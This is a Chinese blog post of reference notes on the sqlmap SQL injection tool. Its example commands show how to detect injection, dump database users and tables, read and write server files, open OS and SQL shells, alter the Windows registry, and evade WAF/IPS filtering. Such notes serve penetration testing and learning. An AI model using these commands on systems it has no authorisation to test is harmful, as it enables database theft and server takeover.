sqlmap

最新推荐文章于 2024-03-27 09:25:37 发布
最新推荐文章于 2024-03-27 09:25:37 发布
阅读量635 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/muwuren/article/details/95896760
版权

sqlmap

Get方法

 sqlmap -hh 	#help
 sqlmap -u "http://192.168.12.23/index.php?page=user-info&username=123&passwd=123456" -p username -f                #-p 只检查username是否有注入 -f 指纹
 -u 	#url
 --users  #数据库的帐号
 --banners
 --dbs	#数据库的库
 --scheme #库,表,属性
 -a 	#all
 sqlmap -d "mysql://username:passwd@192.168.1.1:3306/dvwa" -f --users --banner --dbs --scheme -a 
 -d	#将sqlmap作为客户端连接数据库
 -m	[filename]	#filename	多个的要查询的地址
 -g	#google查询

post方法

使用burpsuit获取post请求
 cut paste --> post.txt
 sqlmap -r post.txt --dbs
burpsuit --> log文件 
	1. options logging
	2. proxy requests log.txt
	3.sqlmap -l log.txt

https

sqlmap -u "https://1.1.1.1/1/php?id=1:8834" --force-ssl

config文件配置

sqlmap -c sqlmap.conf

request

`大小写敏感`
--level:
--data :
   get/post
	sqlmap -u "http://1.1.1.1/1.php" --data="id=67&oi=32" -f
	--method:
		指定get或post  --method=GET 
--param-del:
	变量分隔符
--cookie:

--drop-set-cookie:
	默认为 set-cookie
	sqlmap会自动更换cookie
	当`level >= 2`时才会检测cookie是否有注入
--user-agent:
--random-agent:
	/usr/share/sqlmap/data/txt/user-agents.txt
	当`level >= 3`时才会检测user-agent是否有注入
--host:
	当`level >= 5`时才会检测host是否有注入
--referer:
	`level >= 3`
--headers:
	额外的headers头
	--headers="Host:dsdsds\nUser-Agent:dsdsads\n"
--auth-cert:	--auth-file:
	身份认证	
	客户端身份认证				PEM格式证书

http(s)代理

--proxy="http://1.1.1.1:8080"
--proxy-cert="username:passwd"
--ignore-proxy #忽略系统代理设置,用于本地扫描

减少请求

--delay:
	float, 秒为单位
--timeout:
	default = 30s
--retries:
	default = 3
--randomize:
	sqlmap -u "http://1.1.1.1/1.php" --data="id=100" --randomize="id"
	每次随机id,同时保证id格式不变,如:"100","111"."001"
--scope:
	日志过滤,仅仅匹配scope,使用正则表达式
	sqlmap -l post.log --scope="(www)?\.target\.(com | net | edu)"
--safe-url   --safe-freq:
	防止连续的不正确注入(302)导致服务器封杀
	--safe-freq 几次注入加一次正常请求  
--skip-urlencode:
	不进行URL编码,直接使用原数据进行提交
--eval:
	每次请求执行指定的python代码
	sqlmap -u "http://1.1.1.1/a.php?id=1&hash=ceasdsdsadadadadadsad" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

性能优化

-o:
	--predict-output:
		根据返回值与统计表,不断减少检测范围
		与 `--threads`参数不兼容
		统计表:/usr/share/sqlmap/data/txt/common-outputs.txt
			或/usr/share/sqlmap/txt/common-outputs.txt
	--keep-alive:
		与`--proxy`不兼容
		长连接 http(s)
	--null-connection
		只获取页面大小,不获取具体内容
		通常用于盲注,降低网络带宽
		与`--text-only`(基于页面内容盲注)不兼容
	--threads:
		最大线程数 default = 1
		盲注每个线程 7 确定一个字符,最高位为0
		建议不要过10,可能引起站点可用性
		与`--predict-output`不兼容

injection

-p:
	指定扫描的参数,会使`--level`失效
	-p [1,2,3...]
--skip:
	排除扫描的参数
`uri注入点`:
	在需要的后加*
	sqlmap -u "http://1.1.1.1/param1/value1*/param2/value2"
--dbms:
	指定数据库
	mysql 	oracle	microsoft_sql_server ...
--os:
	指定os
--invalid-bignum / --invalid-logical:
	sqlmap默认使用取负值使参数失效 id = 10 --> -10
	id = 999999999
	id = 12 and 18 = 19
--no-cast:
	将结果转为字符串,并且用空格替换NULL结果
	老板本数据库需要开启
--no-escape:
	将关闭char()编码逃逸的方法替换字符串
--prefix  --suffix:
	闭合前缀与后缀
--tamper:
	混淆脚本,用于绕过应用层过滤, IPS, WAF
	tmaper/between.py ...

detection

--level:
	[1 -- 5]
	/usr/share/sqlmap/xml/payloads
--risk:
	[1 -- 4]
	risk可能会造成数据内容篡改
--string. --not-string, --regexp, --code, --text-only, --files
	页面比较

techniques

默认使用全部技术
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries(文件系统,操作系统,注册表必须)
T: Time-based blind
--time-sec:
	时间盲注延时,default = 5
--union-cols:
	默认联合查询1-10列
	--nuion-cols 6-9 #查询7-10列
--union-char
	联合查询默认NULL,可以指定该参数 
--dns-domain:
	
--second-order:
	在一个页面注入,从另外一个页面体现出来
	--second-order="http://1.1.1.1/b.php"
-f
-b

枚举

 --current-user
• --current-db
• --hostname
• --users
• --privileges -U username 
• --roles
• --dbs
• --tables, --exclude-sysdbs –D dvwa
• -T users -D dvwa -C user --columns
--schema --batch --exclude-sysdbs 
• --count
Dump:
• --dump, -C, -T, -D, --start, --stop
• --dump-all --exclude-sysdbs
• --sql-query "select * from users"
--udf-inject , --shared-lib

file system

 --file-read:
 --file-write="1.txt"  --file-dest="/tmp/1.txt"

os

--os-cmd
--os-shell
--sql-shell
mysql, postgresql:
	上传sys_exec(), sys_eval()两个UDF
mmsql:
	xp_cmdshell

windows registory

--reg-read
--reg-add
--reg-del
--reg-key 	--reg-value		--reg-data		--reg-ype
	sqlmap –u="http://1.1.1.1/a.aspx?id=1" --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --
reg-type=REG_SZ --reg-data=1

general

-s:sqlite会话文件保存位置
-t:流量文件保存位置
--charest:强制字符编码
--crawl:
--cvs-del:
--dbms-cred:
--flush-session:
--force-ssl
--fresh-queries:忽略session查询结果
--hex:
--output-dir
--parese-errors
--save:保存配置至文件

missellaneous

--answer:
--check-waf:检测WAF/IPS/IDS
--hpp:
	http parameter pollution
	绕过WAF/IPS/IDS
	尤其对ASP/IIS ASP.NET/IIS
--identify-waf:
	彻底的waf/ips/ids检查
--moblie:
	模拟手机设备
--smart:
	
--purge-output:
	清除output文件夹
--smart:
	当有大量检测目标时,只基于错误检测结果
--wizard:
	向导模式

代理使用
sqlmap.py --proxy=(http|https|socks4|socks5)?/address:port --proxy-cred=username:password

muwuren
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap资源下载.txt
05-27
通过上传到burpsuite,可以在burp中集成使用sqlmap,非常实用的一款工具
sqlmap-master
01-04
sqlmap-master
SQLMAP数据库注入工具下载安装
syq8023的博客
12-16 3799
介绍 Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL、 Oracle、 PostgreSQL、 Microsoft SQL Server、 Microsoft Access 等主流数据库。 Sqlmap 使用 5 种 SQL 注入技术(不加参数默认测试所有注入技术) 安装 注意: windows操作系统安装sqlmap需要安装python的运行环境。 下载地址:htt...
23-sqlmap的--level和--risk的区别
m0_62207482的博客
03-27 673
而risk则是风险系数,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会 增加OR语句的QL注入测试。在有些时候,例如在UPDATE的语句中,注入一个OR的测试语句, 可能导致更新的整个表,可能造成很大的风险。level级别越高发送的请求越多,并且在level3以上时会尝试对referer注入。
sqlmap的下载安装
m0_46315342的博客
04-22 2863
sqlmap的下载安装 sqlmap是需要python环境的,所以首先应该下载python,然后在下载sqlmap。 1.下载python2.7.16 python官网下载地址 在官网中下载由于时外网,所以页面刷新比较慢,可能还会出现下载不了的情况。建议使用谷歌游览器,把搜索引擎设置为Bing,使用国际版进行访问。如果还是不能下载,我是点击了很多次,试了很多次,不知道为什么莫名其妙的就可以了,建议...
SQLmap下载和安装教程(详细附图)
weixin_44023403的博客
01-13 1万+
SQLmap下载和安装教程一、准备:1、下载安装python二、下载安装sqlmap 一、准备: python2.X(要是python2) SQLmap python下载地址:https://www.python.org/downloads/ SQLMap下载: http://sqlmap.org/ 1、下载安装python 根据自己电脑系统,选择下载版本,以64bit,Win10为例; 这里下载有点儿慢,可以复制下载链接,用迅雷下载; 双击安装; 将“Add python.exe to Path”
SQLmap的下载和安装,以及其参数大全和使用教程(值得收藏)
Gjqhs的博客
02-17 1万+
sqlmap官网 先把python 下载安装 ,再下载sqlmap 再把aqlmap扔到目录里解压 桌面建立cmd的快捷方式
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap压缩包
SQLMAP Windows
02-23
SQLMAP Windows
sqlmap安装包
01-19
sqlmap工具包,功能非常强大,去用来注入
SqlMap的使用
06-24
本文档详细介绍了SqlMap的使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
sqlmap下载安装.md
04-22
自己在下载安装sqlmap的时候很麻烦,到处找资源,浪费了很多时间,有很多麻烦的操作,所以在自己安装成功之后,分享一下自己的安装经验,希望对别人有帮助。
sqlmap-1.3.9最新完整版.zip
09-16
亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。这是本人从sqlmap上下载来的最新版本sqlmap,没有作任何修改,只是方便各位网友快速下载得到工具(毕竟人家服务器架在国外,下载起来花了我五分钟)
sqlmap1.2安装包
11-13
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。
SqlMap-0.9
06-24
SQL注入攻击属于数据库安全攻击手段之一,可以通过数据库安全防护技术实现有效防护,数据库安全防护技术包括:数据库漏扫、数据库加密、数据库防火墙、数据脱敏、数据库安全审计系统。
sqlmap最新版.zip
10-17
用于寻找SQL注入漏洞,这是从Kali Linux中提取的最新版,增加最优的自定义配置
SQLmap参数详解
Williamanddog的博客
01-19 5362
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
【渗透工具】sqlmap下载安装详细教程Windows/Linux(图文)
热门推荐
Z_David_Z的博客
01-27 1万+
目录==Windows安装Sqlmap:==1.Python2.7下载1.1 下载1.2 安装并配置环境变量2.sqlmap下载2.1 下载2.2 SQLMap安装2.3 建立快捷方式==Linux安装Sqlmap==1.下载sqlmap 源码进行安装2.解压运行3.进入安装目录,运行sqlmap脚本4.使用alias命令用来设置直接调用 Windows安装Sqlmap: 由于SQLMap是基于Python语言的,所以需要先安装Python语言环境 1.Python2.7下载 1.1 下载 地址:https
sqlmap工具】Windows/Linux下载,使用方法、常用命令
02-18 2972
【渗透工具】sqlmap
sqlmap kali
最新发布
04-11
SQLMap是一款开源的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它是基于Python编写的,并且在Kali Linux等渗透测试和安全评估工具中广泛使用。 SQL注入是一种常见的Web应用程序漏洞,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值